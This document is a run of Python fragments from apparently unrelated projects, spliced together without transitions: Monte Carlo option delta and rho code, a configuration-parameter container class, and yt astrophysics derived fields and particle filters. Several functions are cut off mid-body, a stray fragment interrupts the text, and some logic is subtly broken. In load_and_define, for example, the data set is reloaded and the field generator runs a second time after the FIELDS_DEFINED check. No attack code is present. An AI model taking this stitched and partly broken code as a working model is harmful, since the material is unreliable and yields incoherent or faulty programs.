FinalSBump = np.matmul(npMatrix + npBump, Mult)
# Calculate the payoff
if self.__boolIsCall:
npPayoff = FinalS - self.__fltStrike
npPayoffBump = FinalSBump - self.__fltStrike
else:
npPayoff = self.__fltStrike - FinalS
npPayoffBump = self.__fltStrike - FinalSBump
# Build a matrix of zeros the same size as the payoff matrix.
npZeros = np.zeros(npPayoff.shape)
# Build matrices of adjusted payoffs, where the payoff is floored at zero.
npPayoffAdj = np.maximum(npPayoff, npZeros)
npPayoffAdjBump = np.maximum(npPayoffBump, npZeros)
# Get the present value of the monte carlo simulations
npPV = npPayoffAdj * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
npPVBump = npPayoffAdjBump * np.exp(
-self.__fltRiskFreeRate * self.__fltTimeToMaturity)
# Calculate the delta
npAllDelta = (npPVBump - npPV) / npBump
# Calculate the mean delta across simulations for each stock price.
npDelta = np.mean(npAllDelta, axis=1)
# Calculate the standard deviation across simulations for each stock price.
npDeltaSTD = np.std(npAllDelta, axis=1)
# Return the delta and its standard deviation.
return (npDelta, npDeltaSTD)
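A standalone sketch of the bump-and-revalue delta above: the same draws Z price both the base and the bumped stock (common random numbers), so most simulation noise cancels in the finite difference. Values are illustrative; the analytic call delta N(d1) is included only as a sanity check.

```python
import numpy as np
from math import erf, log, sqrt

s0, k, r, vol, t, n = 100.0, 100.0, 0.02, 0.2, 1.0, 200_000
z = np.random.default_rng(0).standard_normal(n)
# One set of multipliers reused for both the base and bumped valuations.
mult = np.exp(z * vol * np.sqrt(t) + (r - 0.5 * vol ** 2) * t)

def pv(s):
    # Discounted call payoff for an initial stock price s.
    return np.maximum(s * mult - k, 0.0) * np.exp(-r * t)

bump = s0 * 0.01  # 1% relative bump, as in getOptionDelta
delta = np.mean((pv(s0 + bump) - pv(s0)) / bump)
# Analytic Black-Scholes call delta N(d1) for comparison.
d1 = (log(s0 / k) + (r + 0.5 * vol ** 2) * t) / (vol * sqrt(t))
analytic = 0.5 * (1.0 + erf(d1 / sqrt(2.0)))
```

The forward difference carries a small upward bias of roughly 0.5 * gamma * bump, so the estimate sits slightly above N(d1).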
def getOptionRho(self, npStock):
# Get the random numbers
Z = np.random.standard_normal((1, self.__intNoIter))
fltBump = 0.0001
fltRiskFreeRateBump = self.__fltRiskFreeRate + fltBump
# Now get the multipliers to find the final stock price
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (self.__fltRiskFreeRate - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
Mult = np.exp(a1 + a2)
a1 = Z * self.__fltVol * np.sqrt(self.__fltTimeToMaturity)
a2 = (fltRiskFreeRateBump - 0.5 * self.__fltVol ** 2) \
* self.__fltTimeToMaturity
MultBump = np.exp(a1 + a2)
# For every stock price, get __intNoIter final stock prices by
# doing a matrix multiplication: the initial stock prices (as a
# column matrix) are multiplied by the row of multipliers to get
# the final stock prices.
npMatrix = npStock.copy()
npMatrix = np.reshape(npMatrix, (len(npStock), -1))
FinalS = np.matmul(npMatrix, Mult)
# Calculate the final stock price using the bumped risk-free rate
FinalSBump = np.matmul(npMatrix, MultBump)
# Calculate the payoff
if self.__boolIsCall:
npPayoff = FinalS - self.__fltStrike
def set_path_translated(self, path, new_value, parameters=None):
"""Set value to a translated path (see _translated_path).
Parameters
----------
path : list of str
Path parts
new_value
New value for the path
parameters : dict
Parameter dictionary; if None, self is used.
Default value None
Returns
-------
None
"""
if parameters is None:
parameters = self
return parameters.set_path(
path=self._translated_path(path),
new_value=new_value
)
def override(self, override):
"""Override container content recursively.
Parameters
----------
override : dict or str
Depending on the type, the following is done:
- If a dict is given, it is used directly to override parameters in the container.
- If a str is given which is a filename of an existing file on disk, the parameter file is loaded and used to override container parameters.
- If a str is given which contains JSON formatted parameters, the content is used to override container parameters.
Raises
------
ImportError:
JSON import failed
ValueError:
Not JSON formatted string given
Returns
-------
self
"""
if isinstance(override, dict):
self.merge(override=override)
elif isinstance(override, str) and os.path.isfile(override):
self.merge(override=ParameterContainer(filename=override).load())
elif isinstance(override, str):
try:
try:
import ujson as json
except ImportError:
try:
import json
except ImportError:
message = '{name}: Unable to import json module'.format(
name=self.__class__.__name__
)
self.logger.exception(message)
raise ImportError(message)
self.merge(override=json.loads(override))
except ValueError:
message = '{name}: Not JSON formatted string given'.format(
name=self.__class__.__name__
)
self.logger.exception(message)
raise ValueError(message)
return self
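The dispatch above can be reduced to a minimal standalone form: merge a dict directly, load an existing file, otherwise parse the string as JSON. `resolve_override` and `load_params` are illustrative names, not part of the container's API.

```python
import json
import os

def resolve_override(override, load_params=None):
    # Return the dict that should be merged into the container.
    if isinstance(override, dict):
        return override
    if isinstance(override, str) and os.path.isfile(override):
        return load_params(override)  # delegate file parsing to the caller
    if isinstance(override, str):
        try:
            return json.loads(override)
        except ValueError as err:
            raise ValueError('Not JSON formatted string given') from err
    raise TypeError('Unsupported override type: {}'.format(type(override)))
```

Note that `json.JSONDecodeError` is a subclass of `ValueError`, so a single `except ValueError` covers both the stdlib and ujson parsers.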
def _process_method_parameters(self, parameters, section):
"""Process methods and recipes in the section
Processing rules for fields:
- "method" => search for parameters from the [section]_method_parameters section
- "recipe" => parse the recipe and search for parameters from the [section]_method_parameters section
- "\*recipe" => parse the recipe only
Parameters
----------
parameters : dict
Parameter dictionary
section : str
Section name
Raises
------
ValueError:
Invalid method for parameter field
Returns
-------
self
"""
if section in parameters and parameters[section] and isinstance(parameters[section], dict):
# Get section name for method parameters
section_method_parameters = self._method_parameter_section(
section=section,
parameters=parameters
)
# Inject method parameters
if self.field_labels['LABEL'] in parameters[section]:
if (section_method_parameters in parameters and parameters[section][self.field_labels['LABEL']] in parameters[section_method_parameters]):
self.set_path_translated(
parameters=parameters,
path=[section, 'PARAMETERS'],
new_value=copy.deepcopy(
self.get_path_translated(
parameters=parameters,
path=[section_method_parameters, parameters[section][self.field_labels['LABEL']]]
)
)
)
else:
message = '{name}: Invalid method for parameter field, {field}->method={method}'.format(
name=self.__class__.__name__,
field=section,
method=parameters[section][self.field_labels['LABEL']]
)
self.logger.exception(message)
raise ValueError(message)
# Inject parameters based on recipes
if self.field_labels['RECIPE'] in parameters[section]:
# Remove current parameters
self.set_path_translated(
parameters=parameters,
path=[section, 'PARAMETERS'],
new_value={}
)
for item in self.get_path_translated(parameters=parameters, path=[section, 'RECIPE']):
if self.field_labels['LABEL'] in item:
label = item[self.field_labels['LABEL']]
elif 'label' in item:
label = item['label']
else:
# Skip recipe items without a label instead of reusing a stale value.
continue
method_parameters = self.get_path_translated(
parameters=parameters,
path=[section_method_parameters, label]
)
if method_parameters:
self.set_path_translated(
parameters=parameters,
path=[section, 'PARAMETERS', label],
new_value=method_parameters
)
else:
message = '{name}: Cannot find any parameters for the method in the recipe field, {field}->recipe={method}'.format(
name=self.__class__.__name__,
field=section,
method=label
)
self.logger.exception(message)
raise ValueError(message)
return self
def _translated_path(self, path):
"""Path translation; the defined section and field label maps are used as the translation map.
Parameters
----------
path : list of str
Path parts
Returns
-------
list of str
Path parts with translation
"""
translated_path = []
for p in path:
if p in self.section_labels:
translated_path.append(self.section_labels.map(p))
elif p in self.field_labels:
translated_path.append(self.field_labels.map(p))
else:
translated_path.append(p)
return translated_path
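A minimal standalone version of the lookup order used above (section map first, field map second, identity otherwise); plain dicts stand in for the mapping containers.

```python
def translate_path(path, section_map, field_map):
    # Translate each path part through the first map that knows it.
    out = []
    for part in path:
        if part in section_map:
            out.append(section_map[part])
        elif part in field_map:
            out.append(field_map[part])
        else:
            out.append(part)
    return out
```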
def _prepare_paths(self, parameters):
"""Prepare paths
Parameters
----------
parameters : dict
Parameter dictionary
"""
if self.section_labels['PATH'] in parameters:
if platform.system() == 'Windows':
# Translate separators if in Windows
for path_key, path in iteritems(self.get_path_translated(parameters=parameters, path=['PATH'])):
if isinstance(path, str):
self.set_path_translated(
parameters=parameters,
path=['PATH', path_key],
new_value=Path(path).posix_to_nt()
)
elif isinstance(path, dict):
for path_key_sub, path_sub in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', path_key])):
if isinstance(path_sub, str):
self.set_path_translated(
parameters=parameters,
path=['PATH', path_key, path_key_sub],
new_value=Path(path_sub).posix_to_nt()
)
# Translate paths to be absolute
if self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS']):
# Container has application paths
if self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS', 'BASE']):
# Container has application base path
base_path = self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS', 'BASE'])
if not os.path.isabs(base_path):
base_path = os.path.join(self.app_base, base_path)
self.set_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS', 'BASE'],
new_value=base_path
)
else:
# No base path given, use main application base
base_path = self.app_base
# Extend rest of the application paths
for path_key, path in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', 'APPLICATION_PATHS'])):
if path_key != self.field_labels['BASE'] and not os.path.isabs(path):
path = os.path.join(base_path, path)
self.set_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS', path_key],
new_value=path
)
if self.get_path_translated(parameters=parameters, path=['PATH', 'EXTERNAL_PATHS']):
# Container has external paths
for path_key, path in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', 'EXTERNAL_PATHS'])):
if not os.path.isabs(path):
path = os.path.join(self.app_base, path)
self.set_path_translated(
parameters=parameters,
path=['PATH', 'EXTERNAL_PATHS', path_key],
new_value=path
)
def _process_application_paths(self, parameters, create_paths=True, create_parameter_hints=True):
"""Process application paths
Parameters
----------
parameters : dict
Parameter dictionary
create_paths : bool
Create paths
Default value True
create_parameter_hints : bool
Create parameters files to all data folders
Default value True
"""
# Make sure extended paths exists before saving parameters in them
if create_paths:
# Create paths
paths = self.get_path_translated(
parameters=parameters,
path=['PATH']
)
if paths:
for path_key, path in iteritems(paths):
if isinstance(path, str):
Path().create(path)
elif isinstance(path, dict):
for path_key_sub, path_sub in iteritems(self.get_path_translated(parameters=parameters, path=['PATH', path_key])):
if isinstance(path_sub, str):
Path().create(path_sub)
# Check path_structure
app_paths = self.get_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS']
)
if app_paths:
# Application paths are used
for field, structure in iteritems(self.path_structure):
if field in app_paths:
if self.field_labels['BASE'] in app_paths:
path_base = os.path.join(
app_paths[self.field_labels['BASE']],
app_paths[field]
)
else:
path_base = os.path.join(
self.app_base,
app_paths[field]
)
# Generate full path with parameter hashes
path = ApplicationPaths(
parameter_container=parameters
).generate(
path_base=path_base,
structure=structure
)
# Check for path limitations
if platform.system() == 'Windows':
if isinstance(path, dict):
for key, p in iteritems(path):
if len(p) >= 255:
message = '{name}: Path potentially exceeds Windows path length limit (255) [{path}]'.format(
name=self.__class__.__name__,
path=p
)
self.logger.warning(message)
# Create directories
if create_paths:
Path().create(paths=path)
# Create parameter hints
if create_parameter_hints:
ApplicationPaths(
parameter_container=parameters
).save_parameters_to_path(
path_base=path_base,
structure=structure,
parameter_filename=self.application_directory_parameter_filename
)
# Update path in the container
self.set_path_translated(
parameters=parameters,
path=['PATH', 'APPLICATION_PATHS', field],
new_value=path
)
def _add_hash_to_main_parameters(self, parameters):
"""Add hash to the main sections.
Parameters
----------
parameters : dict
Parameter dictionary
"""
for field, params in iteritems(parameters):
if isinstance(params, dict):
if field not in self.non_hashable_sections and parameters[field]:
parameters[field]['_hash'] = self.get_hash(
data=parameters[field]
)
def _add_hash_to_method_parameters(self, parameters):
"""Add hash to the method parameter sections.
Parameters
----------
parameters : dict
Parameter dictionary
"""
for field in parameters:
if field.endswith('_' + self.field_labels['METHOD_PARAMETERS']):
for key, params in iteritems(parameters[field]):
if params and isinstance(params, dict):
params['_hash'] = self.get_hash(
data=params
)
def _add_main_hash(self, parameters):
"""Add main level hash.
Parameters
----------
parameters : dict
Parameter dictionary
"""
data = {}
for field, params in iteritems(parameters):
if isinstance(params, dict):
if field not in self.non_hashable_sections and parameters[field]:
data[field] = self.get_hash(
data=parameters[field]
)
parameters['_hash'] = self.get_hash(
data=data
)
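The two hashing passes can be sketched standalone. `get_hash` here is an assumed stand-in (MD5 of key-sorted JSON); the real container's hashing may differ.

```python
import hashlib
import json

def get_hash(data):
    # Deterministic hash: serialize with sorted keys, then MD5.
    return hashlib.md5(json.dumps(data, sort_keys=True).encode('utf8')).hexdigest()

def add_main_hash(parameters, non_hashable=('path',)):
    # Hash each hashable top-level section, then hash the section hashes.
    data = {}
    for field, params in parameters.items():
        if isinstance(params, dict) and field not in non_hashable and params:
            data[field] = get_hash(params)
    parameters['_hash'] = get_hash(data)
    return parameters
```

Because non-hashable sections (such as paths) are skipped, moving the data directories does not change the main hash.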
def _after_load(self, to_return=None):
"""Method triggered after parameters have been loaded."""
self.processed = False
def _clean_unused_parameters(self):
"""Remove unused parameters from the parameter dictionary."""
for field in list(self.keys()):
if field.endswith('_' + self.field_labels['METHOD_PARAMETERS']):
del self[field]
def _convert_main_level_to_containers(self, parameters):
"""Convert main level sections to DictContainers.
Parameters
----------
parameters : dict
Parameter dictionary
"""
for key, item in iteritems(parameters):
if isinstance(item, dict) and self.field_labels['PARAMETERS'] in item:
item[self.field_labels['PARAMETERS']] = DictContainer(item[self.field_labels['PARAMETERS']])
if isinstance(item, dict):
parameters[key] = DictContainer(item)
def _method_parameter_section(self, section, parameters):
"""Get section name for method parameters.
Parameters
----------
section : str
Section name
parameters : dict
Parameter dictionary
Returns
-------
str
"""
# Get LABEL for section
section_label_map = OneToOneMappingContainer(self.section_labels)
section_translation_label = section_label_map.flipped.map(section)
# Test a few patterns to find method parameter section
# Test pattern [LABEL + METHOD_PARAMETERS]
method_parameter_section = section + '_' + self.field_labels['METHOD_PARAMETERS']
if method_parameter_section not in parameters:
if section_translation_label:
# Test mapped [LABEL + '_METHOD_PARAMETERS']
method_parameter_section = section_label_map.map(section_translation_label + '_METHOD_PARAMETERS')
if method_parameter_section not in parameters:
# Test mapped [LABEL + '_PARAMETERS']
method_parameter_section = section_label_map.map(section_translation_label + '_PARAMETERS')
if method_parameter_section not in parameters:
# No fitting method parameter section found
method_parameter_section = None
else:
method_parameter_section = None
return method_parameter_section
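The cascade of fallbacks above is essentially "first existing section wins"; a compact sketch with illustrative names:

```python
def first_existing_section(candidates, parameters):
    # Return the first candidate section name present in parameters, else None.
    for name in candidates:
        if name is not None and name in parameters:
            return name
    return None
```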
def update_parameter_set(self, set_id):
"""Update active parameter set
Parameters
----------
set_id : str
Set id used in set list
Raises
------
ValueError:
No valid set id given
Returns
-------
self
"""
current_active_set = ListDictContainer(self[self.field_labels['SET-LIST']]).search(
key=self.field_labels['SET-ID'],
value=self[self.field_labels['ACTIVE-SET']]
)
new_active_set = ListDictContainer(self[self.field_labels['SET-LIST']]).search(
key=self.field_labels['SET-ID'],
value=set_id
)
if not new_active_set:
message = '{name}: No valid set given [{set_name}]'.format(
name=self.__class__.__name__,
set_name=set_id
)
self.logger.exception(message)
raise ValueError(message)
# Clean up main level from old sections
for section in current_active_set:
if section in self:
del self[section]
# Update parameters
self.merge(override=new_active_set)
# Set new active set
self[self.field_labels['ACTIVE-SET']] = set_id
return self
def set_ids(self):
"""Get set ids
Returns
-------
list
"""
if self.field_labels['SET-LIST'] in self:
set_ids = []
for set_defined_parameters in self[self.field_labels['SET-LIST']]:
if self.field_labels['SET-ID'] in set_defined_parameters:
set_ids.append(
set_defined_parameters[self.field_labels['SET-ID']]
)
return sorted(set_ids)
else:
return None
def set_id_exists(self, set_id):
"""Set id exists
Parameters
----------
set_id : str
Parameter set id
Returns
-------
bool
"""
set_ids = self.set_ids()
return set_ids is not None and set_id in set_ids
*\
(l == data.ds.parameters['MaximumRefinementLevel']))
return answer
def _above_chiaki_threshold(field,data):
C_f = data[('gas','C_Fraction')].value
Fe_f = data[('gas','Fe_Fraction')].value
H_f = data[('gas','H_fraction')].value
return physics.chiaki_threshold(C_f, Fe_f, H_f, return_value=False).astype(np.float64)
def _chiaki_value(field,data):
C_f = data[('gas','C_Fraction')].value
Fe_f = data[('gas','Fe_Fraction')].value
H_f = data[('gas','H_fraction')].value
return physics.chiaki_threshold(C_f, Fe_f, H_f, return_value=True)
yt.add_field(("gas","a_rad"), sampling_type = 'cell',function=_rad_accel, units="cm/s**2")
yt.add_field(('index','DM_background_density'), sampling_type = 'cell',function = _dm_density, units = 'g/cm**3')
yt.add_field(('index','DM_background_potential'), sampling_type = 'cell',function = _dm_potential, units = 'erg/g')
yt.add_field(('index','magnitude_cylindrical_radius'), sampling_type = 'cell',function = _mag_cyl_r, units = 'cm')
yt.add_field(('index','magnitude_cylindrical_z'),sampling_type = 'cell', function = _mag_cyl_z, units = 'cm')
# def _H2_total_mass(field, data):
# mass = data[('gas',
yt.add_field(('gas','Pe_heating_rate'),sampling_type = 'cell', function = _pe_heating_cgs, units = 'erg/s/cm**3')
yt.add_field(('gas','H_total_mass'), sampling_type = 'cell',function = _H_total_mass, units ='g')
yt.add_field(('gas','H_Mass'),sampling_type = 'cell', function = _H_total_mass, units = 'g') # define as same
yt.add_field(('gas','He_total_mass'), sampling_type = 'cell',function = _He_total_mass, units = 'g')
yt.add_field(('gas','metal_mass'), sampling_type = 'cell',function = _metal_total_mass, units = 'g')
yt.add_field(('gas','OTLW_kdissH2I'), sampling_type = 'cell',function = _otlwcgs, units = '1/s',
validators=ValidateDataField(('enzo','OTLW_kdissH2I')))
yt.add_field(('gas','LW_flux'), sampling_type = 'cell',function = _LW_flux, units = "erg/s/cm**2",
validators=ValidateDataField(('enzo','OTLW_kdissH2I')))
yt.add_field(('gas','above_chiaki_threshold'), sampling_type = 'cell',function = _above_chiaki_threshold,
units="")
yt.add_field(('gas','chiaki_value'),sampling_type = 'cell', function = _chiaki_value,
units="")
yt.add_field(('gas','is_star_forming'),sampling_type = 'cell', function = _is_star_forming,
units = "")
yt.add_field(('gas','Pe_heating_rate_masked'),sampling_type = 'cell', function = _pe_heating_rate_masked, units='erg/s/cm**3')
yt.add_field(('gas','G_o'), sampling_type = 'cell',function = _G_o, units = "")
yt.add_field(('gas','G_eff'), sampling_type = 'cell',function = _G_eff, units = "")
yt.add_field(('gas','FUV_flux'), sampling_type = 'cell',function = _FUV_flux, units = "erg/s/cm**2")
yt.add_field(('gas','Q0_flux'),sampling_type = 'cell', function = _Q0_flux, units = "erg/s/cm**2")
yt.add_field(('gas','Q1_flux'),sampling_type = 'cell', function = _Q1_flux, units = "erg/s/cm**2")
# yt.add_field(('gas','H2_total_mass'), function = _H2_total_mass, units = 'g')
# yt.add_field(('gas','All_H_total_mass'), function = _all_H_total_mass, units = 'g')
if (('enzo','PotentialField') in fields) or (('enzo', 'GravPotential') in fields) or (('enzo','Grav_Potential') in fields):
yt.add_field(('gas','pos_gravitational_potential'), sampling_type = 'cell',function=_grav_pot, units = 'erg/g')
yt.add_field(('gas','gas_gravitational_potential'), sampling_type = 'cell',function=_gas_grav_pot, units = 'erg/g')
yt.add_field(('gas','total_gravitational_potential'),sampling_type = 'cell', function=_tot_grav_pot, units = 'erg/g')
yt.add_field(('gas','pos_total_gravitational_potential'), sampling_type = 'cell',function=_pos_tot_grav_pot, units = 'erg/g')
yt.add_field(('gas','potential_energy'),sampling_type = 'cell', function=_potential_energy, units = 'erg')
yt.add_field(('gas','gravitationally_bound'), sampling_type = 'cell',function=_grav_bound, units = "")
nfields = 5
return nfields
def generate_derived_fields(ds):
"""
Given a data set (to extract the on-disk field names), generate
derived fields that will persist for the python session (i.e. not
tied only to the passed data set).
Right now, takes in all metal species tracer fields and constructs
fields for their mass fraction, number density, and all possible
interesting abundance ratios.
NOTE: The derived fields will only exist for data sets loaded after
this function call. If analysis is intended for passed data set,
it will need to be reloaded for fields to exist.
"""
global FIELDS_DEFINED  # without this, the assignment below would only create a local
fields = ds.field_list
# lets figure out the metal tracers present
metals = utilities.species_from_fields(fields)
ratios = utilities.ratios_list(metals)
print("defining for the following metals ", metals)
# make new functions to do correct units for species fields
_density_function_generator(metals + ['Metal'])
print("tracer species present: ", metals)
nfields = _mass_function_generator(metals)
print(nfields, "mass fields defined")
nfields = _mass_fraction_function_generator(ds, metals)
print(nfields, "mass fraction fields defined")
nfields = _number_density_function_generator(metals)
print(nfields, "number density fields defined")
if not (ionization._ion_table is None):
nfields = _ionization_state_generator(metals)
print(nfields, "ionization state fields defined")
nfields = _abundance_ratio_function_generator(ratios, metals, H_mode = 'total')
print(nfields, "abundance ratio fields defined")
nfields = _abundance_function_generator(metals)
if ds.parameters['NumberOfParticles'] > 0:
if ('all','particle_' + metals[0] + '_fraction') in ds.field_list:
nfields = _particle_abundance_ratio_function_generator(ratios, ds)
print(nfields, "particle abundance ratio fields defined")
_particle_abundance_function_generator(metals, ds)
generate_stellar_model_fields(ds)
nfields = _additional_helper_fields(fields)
print(nfields, "additional helper fields defined")
#generate_grackle_fields(ds)
FIELDS_DEFINED = True
return
def load_and_define(name):
"""
Wrapper around yt to load a data set and define gradient
fields and particle filters which must be defined for each
simulation file separately (unlike the above)
"""
ds = yt.load(name)
if not FIELDS_DEFINED:
generate_derived_fields(ds)
ds = yt.load(name)
generate_derived_fields(ds)
gradient_available = generate_gradient_fields(ds)
if gradient_available:
def _grav_accel_x(field,data):
return data[('gas','gas_gravitational_potential_gradient_x')].to('cm/s**2')
def _grav_accel_y(field,data):
return data[('gas','gas_gravitational_potential_gradient_y')].to('cm/s**2')
def _grav_accel_z(field,data):
return data[('gas','gas_gravitational_potential_gradient_z')].to('cm/s**2')
def _grav_accel(field,data):
return np.sqrt(data[('gas','a_grav_x')]**2 + data[('gas','a_grav_y')]**2 + data[('gas','a_grav_z')]**2)
def _a_rad_a_grav(field,data):
a = data[('gas','a_rad')] / data[('gas','a_grav')]
a[data[('gas','a_grav')] == 0.0] = 0.0
return a
ds.add_field(('gas','a_grav_x'), function = _grav_accel_x, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_grav_y'), function = _grav_accel_y, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_grav_z'), function = _grav_accel_z, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_grav'), function = _grav_accel, units = 'cm/s**2', sampling_type='cell')
ds.add_field(('gas','a_rad_over_a_grav'), function = _a_rad_a_grav, units = '', sampling_type = 'cell')
#generate_particle_filters(ds)
#generate_grackle_fields(ds)
return ds
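The a_rad_over_a_grav field above zeroes the ratio wherever gravity is zero rather than letting inf/nan through; the masking can be shown standalone with plain NumPy:

```python
import numpy as np

def safe_ratio(num, den):
    # Elementwise num/den, forced to zero wherever the denominator is zero.
    out = np.zeros_like(num, dtype=float)
    np.divide(num, den, out=out, where=(den != 0.0))
    return out
```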
def load(name):
return load_and_define(name)
def generate_grackle_fields(ds):
if not GRACKLE_IMPORTED:
print("Grackle's python wrapper (pygrackle) was not imported successfully")
return
if ds.parameters['use_grackle']:
_grackle_fields(ds)
return
def generate_gradient_fields(ds):
"""
Generate gradient fields for the gas self-gravity potential, when
the potential field is available on the data set.
"""
if ("gas","gas_gravitational_potential") in ds.derived_field_list:
ds.add_gradient_fields(("gas","gas_gravitational_potential"))
gradient_available = True
else:
gradient_available = False
return gradient_available
def generate_particle_filters(ds):
"""
Make filter definitions for the various particle types:
Main Sequence :
White Dwarf :
SNIa remnant :
SNII remnant :
AGB phase (likely very few or none since short lived) :
"""
@yt.particle_filter(requires=["particle_type"], filtered_type='all')
def all_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] >= 11
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def all_popIII_stars(pfilter, data):
filter = data[(pfilter.filtered_type,"particle_is_popiii")].astype(bool)
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def all_popII_stars(pfilter, data):
filter = np.logical_not(data[(pfilter.filtered_type,"particle_is_popiii")])
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def main_sequence_stars(pfilter, data):
filter = (data[(pfilter.filtered_type, "particle_type")] == 11) +\
(data[(pfilter.filtered_type, "particle_type")] == 15)
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def main_sequence_popIII_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 14
return filter
@yt.particle_filter(requires=["particle_type"], filtered_type='all_stars')
def remnant_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 13
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
def low_mass_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 11
filter = filter * (data[(pfilter.filtered_type,"birth_mass")] > 2.0) * (data[(pfilter.filtered_type,"birth_mass")] < 8.0)
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
def low_mass_unresolved_stars(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 15
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
def white_dwarf(pfilter, data):
filter = data[(pfilter.filtered_type, "particle_type")] == 12
return filter
ds.add_particle_filter('main_sequence_stars')
ds.add_particle_filter('remnant_stars')
ds.add_particle_filter('low_mass_stars')
ds.add_particle_filter('low_mass_unresolved_stars')
ds.add_particle_filter("white_dwarf")
ds.add_particle_filter('main_sequence_popIII_stars')
ds.add_particle_filter("all_popII_stars")
ds.add_particle_filter("all_popIII_stars")
ds.add_particle_filter("all_stars")
#
#
# End of life filters for non-SNIa
#
#
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_stars')
def all_remnants(pfilter, data):
filter = data[(pfilter.filtered_type,"particle_type")] == 13
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
else:
filter = np.zeros(data[(pfilter.filtered_type, "birth_mass")].shape, dtype=bool)  # Pop III formation disabled: all-False filter
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_ccsne_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
filter = filter * ((data[(pfilter.filtered_type,'birth_mass')] >= data.ds.parameters['TypeIILowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= data.ds.parameters['TypeIIUpperMass']))
else:
filter = np.zeros(data[(pfilter.filtered_type, "birth_mass")].shape, dtype=bool)  # Pop III formation disabled: all-False filter
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_pisne_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
filter = filter * ((data[(pfilter.filtered_type,'birth_mass')] >= data.ds.parameters['PISNLowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= data.ds.parameters['PISNUpperMass']))
else:
filter = np.zeros(data[(pfilter.filtered_type, "birth_mass")].shape, dtype=bool)  # Pop III formation disabled: all-False filter
return filter
@yt.particle_filter(requires=['particle_type','birth_mass'], filtered_type='all_remnants')
def popIII_direct_collapse_remnant(pfilter, data):
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = data[(pfilter.filtered_type,'metallicity_fraction')] < data.ds.parameters['PopIIIMetalCriticalFraction']
else: # use the Chiaki threshold:
filter = np.logical_not( data[(pfilter.filtered_type,'particle_above_chiaki_threshold')] )
filter = filter * (np.logical_not((data[(pfilter.filtered_type,'birth_mass')] >= data.ds.parameters['PISNLowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= data.ds.parameters['PISNUpperMass'])) *\
np.logical_not((data[(pfilter.filtered_type,'birth_mass')] >= data.ds.parameters['TypeIILowerMass']) *\
(data[(pfilter.filtered_type,'birth_mass')] <= data.ds.parameters['TypeIIUpperMass'])))
else:
filter = np.logical_not(data[(pfilter.filtered_type, "birth_mass")] == data[(pfilter.filtered_type, "birth_mass")])
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_remnants')
def ccsne_remnant(pfilter, data):
filter = ((data[(pfilter.filtered_type, "birth_mass")] <= data.ds.parameters['IndividualStarDirectCollapseThreshold']) *\
(data[(pfilter.filtered_type, "birth_mass")] >= data.ds.parameters['IndividualStarAGBThreshold']))
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
